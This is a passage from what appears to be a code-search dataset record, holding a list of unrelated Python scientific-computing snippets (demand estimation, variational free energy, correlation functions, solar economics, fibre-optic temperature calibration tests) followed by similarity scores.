self.expected_omega_by_theta_jacobian = expected_omega_jacobian\n self.expected_prices = expected_prices\n self.expected_shares = expected_shares\n self.computation_time = end_time - start_time\n self.draws = draws\n unique_market_ids = problem_results.problem.unique_market_ids\n self.fp_converged = np.array(\n [[m[t].converged if m else True for m in iteration_stats] for t in unique_market_ids], dtype=np.bool_\n )\n self.fp_iterations = np.array(\n [[m[t].iterations if m else 0 for m in iteration_stats] for t in unique_market_ids], dtype=np.int64\n )\n self.contraction_evaluations = np.array(\n [[m[t].evaluations if m else 0 for m in iteration_stats] for t in unique_market_ids], dtype=np.int64\n )\n\n # construct default supply and demand shifter formulations\n self.supply_shifter_formulation = self.demand_shifter_formulation = None\n if self.problem_results.problem.K3 > 0:\n assert self.problem_results.problem.product_formulations[0] is not None\n assert self.problem_results.problem.product_formulations[2] is not None\n\n X1_terms = self.problem_results.problem.product_formulations[0]._terms\n X3_terms = self.problem_results.problem.product_formulations[2]._terms\n X1_expressions = self.problem_results.problem.product_formulations[0]._expressions\n X3_expressions = self.problem_results.problem.product_formulations[2]._expressions\n\n supply_shifters = set()\n for term, expression in zip(X3_terms, X3_expressions):\n if all(str(s) != 'shares' for s in expression.free_symbols) and term.name() != 'Intercept':\n supply_shifters.add(term.name())\n\n demand_shifters = set()\n for term, expression in zip(X1_terms, X1_expressions):\n if all(str(s) != 'prices' for s in expression.free_symbols) and term.name() != 'Intercept':\n demand_shifters.add(term.name())\n\n if supply_shifters - demand_shifters:\n supply_shifter_formula = ' + '.join(sorted(supply_shifters - demand_shifters))\n self.supply_shifter_formulation = Formulation(f'{supply_shifter_formula} - 1')\n\n if demand_shifters - supply_shifters:\n demand_shifter_formula = ' + '.join(sorted(demand_shifters - supply_shifters))\n self.demand_shifter_formulation = Formulation(f'{demand_shifter_formula} - 1')", "def 
get_characteristic_vals(self):\n\n # Characteristic quantity of x\n x = scutils.qv2x(self.dyn_sys.tpwl_dict['q'], self.dyn_sys.tpwl_dict['v'])\n x_char = np.abs(x).max(axis=0)\n\n # Characteristic quantity of the dynamics f\n f = np.zeros(x.shape)\n for i in range(x.shape[0]):\n f[i, :], _, _ = self.get_continuous_dynamics(x[i, :], self.dyn_sys.tpwl_dict['u'][i, :])\n f_char = np.abs(f).max(axis=0)\n\n return x_char, f_char", "def _construct_compute_fe_terms(self):\n # setup some symbolic variables for theano to deal with\n xi = T.matrix()\n xo = T.matrix()\n _, hi_zmuv = self._construct_zmuv_samples(xi, 1)\n # construct values to output\n nll = self.nlli[-1]\n kld = self.kld_z.flatten() + self.kld_hi_q2p.flatten()\n # compile theano function for a one-sample free-energy estimate\n fe_term_sample = theano.function(inputs=[ xi, xo ], \\\n outputs=[nll, kld], \\\n givens={self.x_in: xi, \\\n self.x_out: xo, \\\n self.hi_zmuv: hi_zmuv}, \\\n updates=self.scan_updates)\n # construct a wrapper function for multi-sample free-energy estimate\n def fe_term_estimator(XI, XO, sample_count):\n # compute a multi-sample estimate of variational free-energy\n nll_sum = np.zeros((XI.shape[0],))\n kld_sum = np.zeros((XI.shape[0],))\n for i in range(sample_count):\n result = fe_term_sample(XI, XO)\n nll_sum += result[0].ravel()\n kld_sum += result[1].ravel()\n mean_nll = nll_sum / float(sample_count)\n mean_kld = kld_sum / float(sample_count)\n return [mean_nll, mean_kld]\n return fe_term_estimator", "def getcfix(self):\n cfix_ = ctypes.c_double()\n res = __library__.MSK_XX_getcfix(self.__nativep,ctypes.byref(cfix_))\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n cfix_ = cfix_.value\n _cfix_return_value = cfix_\n return (_cfix_return_value)", "def calculate(self):\n\n fx_r = self.fx + self.r\n fy_r = self.fy\n gx_r = self.gx + self.r\n gy_r = self.gy\n\n fg_dx = np.linspace(self.fx[0], gx_r[-1], self.N)\n ff_dx = np.linspace(self.fx[0], fx_r[-1], self.N)\n gg_dx = np.linspace(self.gx[0], gx_r[-1], self.N)\n\n xCorrfg = integrate.trapz(self.fy*gy_r, fg_dx)\n aCorrff = integrate.trapz(self.fy*fy_r, ff_dx)\n aCorrgg = integrate.trapz(self.gy*gy_r, gg_dx)\n\n xCorrfg_w = integrate.trapz(self.w*xCorrfg, self.r)\n aCorrff_w = integrate.trapz(self.w*aCorrff, self.r)\n aCorrgg_w = integrate.trapz(self.w*aCorrgg, self.r)\n \n return xCorrfg_w / np.sqrt(aCorrff_w * aCorrgg_w)", "def getfquad(element, energy=None, fwhm_ev = 0, lw = 50, f1f2 = \"f1\",\n kernel=\"cauchy\"):\n try: Z = int(element)\n except: Z = elements.Z[element]\n \n fwhm_ev = abs(fwhm_ev)\n \n if energy is None:\n energy, iedge = get_energies(Z, 1000, 10000, fwhm_ev=fwhm_ev)\n return_ene = True\n else:\n energy = np.array(energy, ndmin=1)\n return_ene = False\n \n if f1f2 == \"f2\" or f1f2 == 1:\n ind = 1\n else:\n ind = 0\n \n \n if fwhm_ev <= np.finfo(float).eps:\n result = deltaf.clcalc(Z, energy)[ind]\n else:\n \n if kernel==\"cauchy\":\n corrfac = 1./quad(cauchy, -lw, lw, args=(1,), limit=500)[0]\n integrand = lambda x, E: cauchy(x, fwhm_ev) * deltaf.clcalc(Z, E-x)[ind]\n elif kernel==\"normal\":\n corrfac = 1./quad(normal, -lw, lw, args=(1,), limit=500)[0]\n integrand = lambda x, E: normal(x, fwhm_ev) * deltaf.clcalc(Z, E-x)[ind]\n \n def ffunc(E):\n return quad(integrand, -lw*fwhm_ev, lw*fwhm_ev, args=(E,), limit=500)[0]\n \n if np.isscalar(energy) or len(energy)==1:\n result = corrfac * ffunc(energy)\n else:\n fvec = np.vectorize(ffunc)\n result = corrfac * fvec(energy)\n \n if return_ene:\n return energy, 
result\n else:\n return result", "def __call__ ( self , x ) :\n return complex_derivative ( self.func ,\n complex ( x ) ,\n h = self.step ,\n I = self.order ,\n err = self.err ,\n real = self.__real ,\n imag = self.__imag )", "def _derX(self, x, y):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c])\n return dfdx", "def run_fourier_ring_correlation(self, bin_size=None):\n # This is done in the fourier plane\n exp_ft = self.exp.fft(True)\n obs_ft = self.obs.fft(True)\n\n # Get correlations\n axdict = obs_ft.axes_manager.as_dictionary()\n axdict = [axdict[keys] for keys in axdict.keys()]\n exp_obs_xc = ModifiedImage(np.real(obs_ft * np.conj(exp_ft)), axes=axdict)\n obs_ac = ModifiedImage(obs_ft.amplitude**2, axes=axdict)\n\n axdict = exp_ft.axes_manager.as_dictionary()\n axdict = [axdict[keys] for keys in axdict.keys()]\n exp_ac = ModifiedImage(exp_ft.amplitude**2, axes=axdict)\n\n xc = exp_obs_xc.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n ac1 = exp_ac.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n ac2 = obs_ac.integrate_radial(bin_size=bin_size, shifted=False, show_progressbar=False)\n\n fsc = xc / np.sqrt(ac1*ac2)\n\n fsc.axes_manager[-1].units = obs_ft.axes_manager[-1].units\n fsc.axes_manager[-1].name = r'|q| = |1/r|'\n\n return fsc", "def flux(source, freq=0.0, deltafreq=0.0, daysback=0.0) :\n x = queryFlux(source,freq,deltafreq,daysback)\n return x.flux", "def GetCorrelationFunction(Ri='S',Rj='D',AAP=[]):\n\tNumAAP=len(AAP)\n\ttheta=0.0\n\tfor i in range(NumAAP):\n\t\ttemp=NormalizeEachAAP(AAP[i])\n\t\ttheta=theta+math.pow(temp[Ri]-temp[Rj],2)\n\tresult=round(theta/NumAAP,3)\n\treturn result", "def itkCumulativeGaussianCostFunction_cast(*args):\n return _ITKCostFunctionsPython.itkCumulativeGaussianCostFunction_cast(*args)", "def get_quantum_corr(self, source: str, row: int) -> np.float:\n if source.lower() == 'meas': \n if self.meas_qcorr is not None:\n return self._meas_qcorr[self._check_int(row)]\n else:\n raise qiskit.QiskitError(\n \"To return measured quantum correlations please add qiskit results.\")\n elif source.lower() == 'calc':\n return self._calc_qcorr.setdefault(row,self.quantum_prob(row))\n else:\n raise qiskit.QiskitError(\n \"Invalid source of quantum correlations. 
Should be 'meas' or 'calc'.\")", "def calculate_economics(\n irradiance: pd.DataFrame, temperature: pd.DataFrame, wind_speed: pd.DataFrame,\n CECMod: pd.DataFrame, configuration: float = 1\n ):\n p_out = calculate_dc_output(irradiance, temperature, wind_speed, CECMod=CECMod)\n\n # convert dc to AC - considering a flat loss of 14%\n # we have to improve this in the future\n p_out = [v * 0.86 for v in p_out]\n\n day_count = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n monthly_electricity = []\n\n for month in range(12):\n st_index = sum(day_count[:month + 1]) * 24\n end_index = sum(day_count[:month + 2]) * 24\n data = p_out[st_index: end_index]\n # Note: division by 50 is to match the values - remove it later!\n monthly_electricity.append(sum(data) / len(data) / 50)\n\n total_ac_energy = sum(p_out)\n monthly_ac_energy = pd.DataFrame(\n zip(calendar.month_abbr[1:], monthly_electricity),\n columns=['month', 'Thousand kWh']\n )\n\n # Based on the example here: https://nrel-pysam.readthedocs.io/en/master/Import.html\n\n grid = Grid.default(\"PVWattsCommercial\")\n ur = UtilityRate.from_existing(grid, \"PVWattsCommercial\")\n cl = Cashloan.from_existing(grid,\"PVWattsCommercial\")\n\n sam_data = read_sam_data(configuration)\n for module, data in zip([grid, ur, cl], sam_data[:-1]):\n for k, v in data.items():\n if k == 'number_inputs':\n continue\n try:\n module.value(k, v)\n except AttributeError:\n print(module, k, v)\n\n\n grid.SystemOutput.gen = p_out\n\n grid.execute()\n ur.execute()\n cl.execute()\n\n # list possible outputs here\n adjusted_installed_cost = cl.Outputs.adjusted_installed_cost\n payback_cash_flow = [-1 * x for x in cl.Outputs.cf_discounted_payback]\n\n return total_ac_energy, monthly_ac_energy, adjusted_installed_cost, payback_cash_flow", "def calculate_correlations(input_data, index_col, cat_features, exclu_elements): \r\n try:\r\n # encode the categorical features\r\n encoded_data = pd.get_dummies(input_data,columns=cat_features,drop_first=True)\r\n\r\n pd_transposed_data = encoded_data.set_index('Style_display_code').T\r\n\r\n # get the number of items\r\n items_list = [str(a) for a in pd_transposed_data.columns]\r\n\r\n print(\"Number of items to correlate :{}_Timestamp:{}\".format(str(len(items_list)), \r\n format(str(datetime.now()))))\r\n \r\n\r\n #compute correlations and save the pickle file\r\n# matrix = pd_transposed_data.corr().values\r\n# pickle.dump(matrix, open(staging_dir+ '/corr_matrix_output_py3.p', 'wb'))\r\n \r\n # read from the saved pickle file - ONLY FOR CONSECUTIVE RUNS, TO SAVE TIME\r\n matrix = pickle.load(open(staging_dir+ '/corr_matrix_output_py3.p', \"rb\" ) )\r\n\r\n print(\"Corr Matrix size:{}_Timestamp:{}\".format(str(matrix.size),\r\n format(str(datetime.now()))))\r\n\r\n except Exception as e:\r\n print(\" Error !!\", e)\r\n \r\n # return the top correlated items\r\n return top_correlateditems(items_list,matrix, index_col, exclu_elements)", "def __call__(self, x):\n\n np.subtract(x, self.d, out=x)\n np.divide(self.a, x, out=x)\n np.subtract(x, self.b, out=x)\n np.log(x, out=x)\n np.divide(x, -self.e, out=x)\n np.add(x, self.c, out=x)\n\n return x", "def test_single_ended_ols_wls_fix_gamma_fix_dalpha_synthetic():\n\n from dtscalibration import DataStore\n import numpy as np\n\n np.random.seed(0)\n\n cable_len = 100.\n nt = 50\n time = np.arange(nt)\n x = np.linspace(0., cable_len, 500)\n ts_cold = np.ones(nt) * 4.\n ts_warm = np.ones(nt) * 20.\n\n C_p = 15246\n C_m = 2400.\n dalpha_r = 0.0005284\n dalpha_m = 0.0004961\n dalpha_p = 
0.0005607\n gamma = 482.6\n cold_mask = x < 0.5 * cable_len\n warm_mask = np.invert(cold_mask) # == False\n temp_real = np.ones((len(x), nt))\n temp_real[cold_mask] *= ts_cold + 273.15\n temp_real[warm_mask] *= ts_warm + 273.15\n\n st = C_p * np.exp(-dalpha_r * x[:, None]) * \\\n np.exp(-dalpha_p * x[:, None]) * \\\n np.exp(gamma / temp_real) / (np.exp(gamma / temp_real) - 1)\n ast = C_m * np.exp(-dalpha_r * x[:, None]) * \\\n np.exp(-dalpha_m * x[:, None]) / (np.exp(gamma / temp_real) - 1)\n\n print('alphaint', cable_len * (dalpha_p - dalpha_m))\n print('alpha', dalpha_p - dalpha_m)\n print('C', np.log(C_p / C_m))\n print('x0', x.max())\n\n ds = DataStore({\n 'st': (['x', 'time'], st),\n 'ast': (['x', 'time'], ast),\n 'userAcquisitionTimeFW': (['time'], np.ones(nt)),\n 'cold': (['time'], ts_cold),\n 'warm': (['time'], ts_warm)\n },\n coords={\n 'x': x,\n 'time': time},\n attrs={\n 'isDoubleEnded': '0'})\n\n sections = {\n 'cold': [slice(0., 0.5 * cable_len)],\n 'warm': [slice(0.5 * cable_len, cable_len)]}\n\n # OLS\n ds.calibration_single_ended(sections=sections,\n st_label='st',\n ast_label='ast',\n method='ols',\n solver='sparse',\n fix_gamma=(gamma, 0.),\n fix_dalpha=(dalpha_p - dalpha_m, 0.))\n\n np.testing.assert_almost_equal(\n ds.gamma.values, gamma, decimal=6)\n np.testing.assert_almost_equal(\n ds.dalpha.values, dalpha_p - dalpha_m, decimal=8)\n np.testing.assert_almost_equal(\n ds.TMPF.values, temp_real - 273.15, decimal=4)\n\n # WLS\n ds.calibration_single_ended(sections=sections,\n st_label='st',\n ast_label='ast',\n st_var=1.,\n ast_var=1.,\n method='wls',\n solver='sparse',\n fix_gamma=(gamma, 0.),\n fix_dalpha=(dalpha_p - dalpha_m, 0.))\n\n np.testing.assert_almost_equal(\n ds.gamma.values, gamma, decimal=6)\n np.testing.assert_almost_equal(\n ds.dalpha.values, dalpha_p - dalpha_m, decimal=8)\n np.testing.assert_almost_equal(\n ds.TMPF.values, temp_real - 273.15, decimal=4)\n\n pass" ]
[ "0.5634133", "0.5603821", "0.5425639", "0.53961235", "0.5307997", "0.5247506", "0.5236571", "0.5233002", "0.52122086", "0.519866", "0.5186619", "0.51836646", "0.5171188", "0.51476127", "0.51282215", "0.51221067", "0.5082539", "0.5082539", "0.50807905", "0.5078336", "0.5075296", "0.5070359", "0.5068547", "0.50611126", "0.50481534", "0.5042373", "0.5021188", "0.50179434", "0.5012504", "0.49964428", "0.49886325", "0.4974125", "0.49678797", "0.49606818", "0.4938198", "0.49151194", "0.49033985", "0.48961076", "0.48744848", "0.48716778", "0.48515543", "0.48448727", "0.4839649", "0.48394287", "0.483455", "0.48292154", "0.48219216", "0.48182544", "0.4816175", "0.48128682", "0.48119578", "0.48096263", "0.48084232", "0.48052046", "0.4804946", "0.48016778", "0.47993764", "0.4795926", "0.47957864", "0.47928298", "0.47837064", "0.47766277", "0.47765136", "0.47716552", "0.47680125", "0.47670707", "0.47643816", "0.47460282", "0.4745649", "0.473664", "0.47324252", "0.47257254", "0.47191173", "0.4716465", "0.47120783", "0.47049347", "0.4704091", "0.47015035", "0.46982777", "0.46940774", "0.46926123", "0.46926013", "0.4691884", "0.46918806", "0.4690818", "0.46908054", "0.4685073", "0.46841073", "0.4683357", "0.46818414", "0.46814144", "0.46685508", "0.46673796", "0.46661085", "0.46645737", "0.46626", "0.46597207", "0.4656379", "0.46476462", "0.4638474" ]
0.5122659
15
Cleans up the LibXC C struct on deletion
def __del__(self):
    if self.xc_func is None:
        return

    if self._xc_func_init:
        core.xc_func_end(self.xc_func)

    core.xc_func_free(self.xc_func)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __del__(self):\n #self.myCModule.free_array(self.arrayRef)\n pass", "def cleanup(self):\n\n self.PLC['1'].set_plc_mode(0)\n self.PLC['1'].plc_clear('all')\n super(Test200SmartSanityClear005, self).cleanup()", "def _clean_up(self):", "def cleanup(self):\n self._tmp_obj.cleanup()", "def cleanup(self):", "def cleanup(self):", "def cleanup(self):", "def cleanup():", "def __del__(self):\r\n self.cleanup()", "def __del__(self):\n LIB.mnt_grid_del.argtypes = [POINTER(c_void_p)]\n ier = LIB.mnt_grid_del(self.obj)\n if ier:\n error_handler(FILE, '__del__', ier)", "def test_data_object_del_all(self):\n pass", "def __exit__(self, exc_type, exc_value, traceback):\n\t\tself.delete_extracted()\n\t\tself.delete()", "def cleanup(self):\n shutil.rmtree(self._crx_dir)\n self._crx_dir = None", "def __del__(self):\n del self.traj\n del self.dcf\n del self._tmp_fft_array\n del self.cl_kerneltable\n del self.cl_deapo\n del self._check\n del self.queue\n del self.ctx\n del self.prg\n del self.fft", "def __del__(self):\n del self.traj\n del self.dcf\n del self._tmp_fft_array\n del self.cl_kerneltable\n del self.cl_deapo\n del self._check\n del self.queue\n del self.ctx\n del self.prg\n del self.fft", "def clean_up(self):\n while len(self.__refs_for_deletion): \n attr = self.__refs_for_deletion.pop()\n obj = getattr(self, attr)\n if hasattr(obj, 'clean_up'):\n obj.clean_up()\n delattr(self, attr)", "def clean_up(self):\n\t\tpass", "def __delete__(self, instance):\n self._lib_vscf_ecc.vscf_ecc_delete(self.ctx)", "def clean(obj):\n clean_up_generated_files(obj)", "def __del__(self):\r\n self.clearList()", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def deinit(self) -> None:", "def cleanUp(self):\r\n pass", "def __del__(self):\n\t\tself._pc.gid_clear()", "def cleanup():\n cat = CSVCatalog.CSVCatalog()\n cat.drop_table(\"people\")\n cat.drop_table(\"batting\")\n cat.drop_table(\"teams\")", "def destroy(self):\n self.db = None\n self.gen_cursor = None\n self.map = None\n self.fmap = None\n self.smap = None\n FlatBaseModel.destroy(self)", "def __del__(self):\n self._cleanup()", "async def clean_up(self) -> None:", "def clearRecord(self): \n if self._isinstalled:\n for f in self._table:\n try:\n del self.__dict__[f.name]\n except KeyError:\n pass\n \n for f in self._extra_sql_columns:\n try:\n del self.__dict__[f]\n except KeyError:\n pass\n \n self._original_values.clear()\n self._modified_values.clear()\n self._mtm_referencelist.clear()\n self._child_referencelist.clear()\n self._hasdata = False\n self._ismodified = False\n self._hasdata = False\n self._isnew = False\n self._objectid = None\n self._isinstalled = False\n self._astxt = \"(null)\"", "def destroy(self):\n if self._ptr is not None:\n # run and remove destructor on c data\n _global_destroy(self._display, self._ptr)\n ffi.gc(self._ptr, None)\n self._ptr = None\n self._display = None", "def cleanup(self):\r\n pass", "def clean_up(self):\n pass", "def clean_up(self):\n pass", "def clean(c):\n clean_docker(c)\n clean_repo(c)", "def __del__(self):\n self._destruct()", "def cleanup():\n cat = CSVCatalog.CSVCatalog()\n cat.drop_table(\"people\", force_drop=True)\n cat.drop_table(\"batting\", force_drop=True)\n cat.drop_table(\"teams\", force_drop=True)", "def destroy(self):", "def destroy(self):", "def destroy(self):", "def 
test_data_object_del(self):\n pass", "def cleanup_and_reset(self):\n self.mem.set(self.mem.META_PLAN, None)\n self.mem.set(self.mem.META_GOALS, None)\n self.mem.set(self.mem.META_CURR_GOAL, None)", "def clear(self):\r\n\t\tself.free_objects[:] = []", "def cleanup(self):\r\n pass", "def cleanup(self):\r\n pass", "def delete_reference_array(self):\r\n del self.pxarray\r\n return", "def delete(self):\n self._instance.delete()\n self._instance = None\n self._data_defs = []", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def cleanup(self):\n pass", "def __del__(self):\n self.Clear()", "def __del__(self):\n if self.hostId_ct.value >= 0:\n self.libcfdll.nccf_free_host(self.hostId_ct)\n self.hostId_ct.value = -1", "def cleanup(self):\n\n pass", "def _clean(self):\n map(self.__delitem__, self.keys())\n self._original = []\n self._columns = {}\n self._modified, self._deleted = {}, {}", "def CrossCleanUp():\n\n global Asm\n\n dec.Asm.Memory = 0\n target.BoundarySync()", "def cleanUp():\n pass", "def cleanup (self):\n pass", "def clear_cxt_vars(cxt):\n if hasattr(cxt, '_cl'):\n del cxt._cl\n if hasattr(cxt, '_pairs'):\n del cxt._pairs", "def cleanup(self, *args, **kwargs):", "def CleanUp(self):\n self.cmd.CleanUp()", "def cleanup():\r\n compiledir = theano.config.compiledir\r\n for directory in os.listdir(compiledir):\r\n file = None\r\n try:\r\n try:\r\n filename = os.path.join(compiledir, directory, \"key.pkl\")\r\n file = open(filename, 'rb')\r\n #print file\r\n try:\r\n keydata = cPickle.load(file)\r\n for key in list(keydata.keys):\r\n have_npy_abi_version = False\r\n have_c_compiler = False\r\n for obj in flatten(key):\r\n if isinstance(obj, numpy.ndarray):\r\n #Reuse have_npy_abi_version to\r\n #force the removing of key\r\n have_npy_abi_version = False\r\n break\r\n elif isinstance(obj, basestring):\r\n if obj.startswith('NPY_ABI_VERSION=0x'):\r\n have_npy_abi_version = True\r\n elif obj.startswith('c_compiler_str='):\r\n have_c_compiler = True\r\n elif (isinstance(obj, (theano.gof.Op, theano.gof.Type)) and\r\n hasattr(obj, 'c_code_cache_version')):\r\n v = obj.c_code_cache_version()\r\n if v not in [(), None] and v not in key[0]:\r\n #Reuse have_npy_abi_version to\r\n #force the removing of key\r\n have_npy_abi_version = False\r\n break\r\n\r\n if not have_npy_abi_version or not have_c_compiler:\r\n try:\r\n #This can happen when we move the compiledir.\r\n if keydata.key_pkl != filename:\r\n keydata.key_pkl = filename\r\n keydata.remove_key(key)\r\n except IOError, e:\r\n _logger.error(\r\n \"Could not remove file '%s'. To complete \"\r\n \"the clean-up, please remove manually \"\r\n \"the directory containing it.\",\r\n filename)\r\n if len(keydata.keys) == 0:\r\n shutil.rmtree(os.path.join(compiledir, directory))\r\n\r\n except EOFError:\r\n _logger.error(\r\n \"Could not read key file '%s'. To complete \"\r\n \"the clean-up, please remove manually \"\r\n \"the directory containing it.\",\r\n filename)\r\n except IOError:\r\n _logger.error(\r\n \"Could not clean up this directory: '%s'. 
To complete \"\r\n \"the clean-up, please remove it manually.\",\r\n directory)\r\n finally:\r\n if file is not None:\r\n file.close()", "def clean(c):", "def deinit(self):\n pass", "def deinit(self):\n pass", "def clean(self):\n # Delete vertices / faces / colors / normals :\n self._vert_buffer.delete()\n self._index_buffer.delete()\n self._normals_buffer.delete()\n self._xrange_buffer.delete()\n self._math_buffer.delete()", "def delete():\n\n # Check the pipe setup.\n check_pipe_setup(sequence=True, j=True)\n\n # The interatomic data.\n for interatom in interatomic_loop():\n # The data.\n if hasattr(interatom, 'j_coupling'):\n del interatom.j_coupling\n\n # The error.\n if hasattr(interatom, 'j_coupling_err'):\n del interatom.j_coupling_err", "def __del__(self):\r\n pass", "def delete(self):\n self.data = None", "def __cleanup(self):\n self.display = None\n self.parent = None\n self.name = None\n self.files = None\n return self", "def __del__(self):\n pass", "def __del__(self):\n pass", "def clear_structure(self):\n self.structure = []\n return", "def cleanup(self):\n\t\tself.pb.cleanup()\n\t\tsys.exit()", "def destroy(self):\n pass # Nothing for now", "def __del__(self):\n\n # Base class destructor is called ?? needed\n sim.Simulation.__del__(self)\n\n if self.verbose:\n print \"Cleaning derived simulation object LAMMPS1\"\n\n del self.pairCoeffDct\n del self.bondCoeffDct", "def clean_up(self):\n # TODO: Implement if needed\n pass", "def destroy():\n pass", "def destroy():\n pass", "def __del__(self):\n \n pass", "def finalizer():\n for resource_type in pods, pvcs, storageclasses, secrets:\n for resource in resource_type:\n resource.delete()\n resource.ocp.wait_for_delete(resource.name)\n if pools:\n # Delete only the RBD pool\n pools[0].delete()\n if projects:\n for project in projects:\n project.delete(resource_name=project.namespace)\n project.wait_for_delete(project.namespace)", "def __delete__(self):\n pass", "def clean():\n clean_flatbuffer_binaries()\n clean_webp_textures()", "def __del__(self) -> None:\n self.delete()", "def __del__(self):\n if self._alloc:\n _pychidg.f90wrap_graphics_bc_t_finalise(this=self._handle)", "def clear(self):\n self._multivol.deallocate(self.id)" ]
[ "0.6692683", "0.64728636", "0.6445634", "0.6374687", "0.63566375", "0.63566375", "0.63566375", "0.63114005", "0.6220566", "0.62159604", "0.62110907", "0.6195016", "0.61885726", "0.6173303", "0.6173303", "0.615202", "0.6146283", "0.6124178", "0.61184067", "0.6114401", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.611096", "0.6098205", "0.60864455", "0.6078006", "0.6067854", "0.6060185", "0.6047654", "0.6039228", "0.60363287", "0.6029367", "0.6026324", "0.6026324", "0.6023784", "0.60190177", "0.6018821", "0.6015646", "0.6015646", "0.6015646", "0.6015621", "0.60144675", "0.5999434", "0.5992235", "0.5992235", "0.5987444", "0.5981281", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5980651", "0.5978798", "0.59767914", "0.5959697", "0.5956959", "0.5949664", "0.59440464", "0.5930683", "0.5929588", "0.5926205", "0.5925768", "0.5924757", "0.5924709", "0.59114546", "0.59114546", "0.5902326", "0.5882815", "0.588194", "0.5879449", "0.5876982", "0.58627677", "0.58627677", "0.58619076", "0.58606404", "0.58596236", "0.585157", "0.5849655", "0.5846428", "0.5846428", "0.58452034", "0.58374727", "0.5826306", "0.5819629", "0.5818305", "0.5815372", "0.5814433" ]
0.5984679
53
Provides a simple string representation with functional name data.
def __repr__(self):
    return '<%s.%s (%s) object at %s>' % (self.__class__.__module__, self.__class__.__name__,
                                          self._xc_func_name, hex(id(self)))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def __str__(self):\n return self.function_representation", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def name(self):\n\t\treturn self._func_name", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def get_name() -> str:", "def get_name():", "def name():\n\n pass", "def name(self):\n return str()", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def nice_name():\n\n pass", "def display_name(self) -> str:\n return f\"{self.func.__module__}.{self.func.__qualname__}\"", "def __str__(self):\n\n strme = \"fed method {} {} {} {}\"\\\n .format(UmbrellaSampling.key, self.x0, self.kf, self.n_upd)\n\n return strme", "def name():\n pass", "def name():\n pass", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def _function_name(func):\n return \"Calling the function: def {}()\".format(func.__name__)", "def __name__(self):\n return '_'.join([function.__name__ for function in self.functions])", "def _str_make(self):\n return self._name if self._fact is None else f\"{self._fact} × {self._name}\"", "def __repr__(self) -> str:\n return f\"<Function[{self.name}](line:{self.line})>\"", "def __str__(self):\n names = [self.name]\n names += [_callable_name(transform) for transform in self.transforms]\n return ' | '.join(names) + f' -> {self.shape} {self.dtype}'", "def getName(self):\n return \"\"", "def __str__(self) -> str:\n # The default str() for Function includes the arity, which is redundant\n # here. 
Just use the symbol's name.\n root_str = self.root.name\n children_str = ', '.join(str(child) for child in self.children)\n return f'{root_str}({children_str})'", "def __str__(self):\n datastr = self.f_val_to_str()\n return_string = \"%s %s\" % (self.f_get_class_name(), self.v_full_name)\n if self.v_comment:\n return_string += \" (`%s`)\" % self.v_comment\n if datastr:\n return_string += \": \" + datastr\n\n return return_string", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def name() -> str:\n pass", "def uniquify_name(self):\n self.name = f'{self.get_name()}_{len(self.store.get_user_functions())}'", "def __str__(self):\n sgf = self.grad_fn\n return \"{}{}\".format(\n str(self.data),\n \", grad_fn={}\".format(\n self.grad_fn.__class__.__name__) if sgf is not None else \"\"\n )", "def get_name():\n return \"SVMd+ - simplified approach\"", "def name(self) -> str: # pragma: no cover", "def __repr__(self):\n text = f'Name:{self.name}'\n return text", "def cFormal(self):\n if not self.type:\n return self.name # special case for '...'\n else:\n arr = self.array or ''\n pointers = self.pointers or ''\n return \"%s %s%s%s\" % (self.type, pointers, self.name, arr)", "def _get_name(self):\n return '%s: %s-%s' % (\n self.fcs_number,\n self.parameter_type,\n self.parameter_value_type)", "def get_name() -> str:\n pass", "def get_data_name(data_func, data_type, npoints, y_error_sigma, x_error_sigma):\n data_name = '{}_{}'.format(data_func.__name__, data_type)\n if data_func.__name__ != 'get_image':\n data_name += 'funcs'\n data_name += '_{}pts_{}ye'.format(npoints, y_error_sigma)\n if x_error_sigma is not None:\n data_name += '_{}xe'.format(x_error_sigma)\n return data_name.replace('.', '_')", "def name(self):\n # type: () -> str\n return str(self)", "def name(self):\n # type: () -> str\n return str(self)", "def as_function_name(self, string):\n return 